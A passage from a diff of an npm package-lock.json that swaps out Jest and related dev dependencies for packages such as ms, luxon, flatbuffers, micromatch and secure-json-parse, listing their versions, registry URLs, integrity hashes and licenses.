"sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "license": "MIT", "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" + "ms": "^2.1.3" }, "engines": { - "node": ">=8" + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true, "engines": { "node": ">=8" } }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" + "to-regex-range": "^5.0.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, + "node_modules/find-replace": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", + "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" }, "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "@75lb/nature": "latest" }, "peerDependenciesMeta": { - "node-notifier": { + "@75lb/nature": { "optional": true } } }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/flatbuffers": { + "version": "24.12.23", + "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", + "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==", + "license": "Apache-2.0" }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" } }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=0.12.0" } }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } + "license": "MIT" }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, + "node_modules/json-bignum": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", + "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=0.8" } }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, + "node_modules/lodash.camelcase": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==", + "license": "MIT" + }, + "node_modules/luxon": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.7.1.tgz", + "integrity": "sha512-RkRWjA926cTvz5rAb1BqyWkKbbjzCGchDUIKMCUvNi17j6f6j8uHGDV82Aqcqtzd+icoYpELmG3ksgGiFNNcNg==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=12" } }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8.6" } }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true + "license": "ISC" }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@opentelemetry/api": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", - "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==", - "license": "Apache-2.0", "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@swc/helpers": { - "version": "0.5.17", - "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", - "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", - "license": "Apache-2.0", - "dependencies": { - "tslib": "^2.8.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", + "node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/command-line-args": { - "version": "5.2.3", - "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", - "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==", - "license": "MIT" - }, - "node_modules/@types/command-line-usage": { - "version": "5.0.4", - "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", - "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==", "license": "MIT" }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true + "node_modules/secure-json-parse": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/secure-json-parse/-/secure-json-parse-3.0.2.tgz", + "integrity": "sha512-H6nS2o8bWfpFEV6U38sOSjS7bTbdgbCGU9wEM6W14P5H0QOsz94KCusifV44GpHDTu2nqZbuDNhTzu+mjDSw1w==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fastify" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/fastify" + } + ], + "license": "BSD-3-Clause" }, - "node_modules/@types/istanbul-lib-report": { + "node_modules/slash": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.17.46", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", - "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", - "license": "MIT", - "dependencies": { - "undici-types": "~6.19.2" - } - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, "engines": { "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": 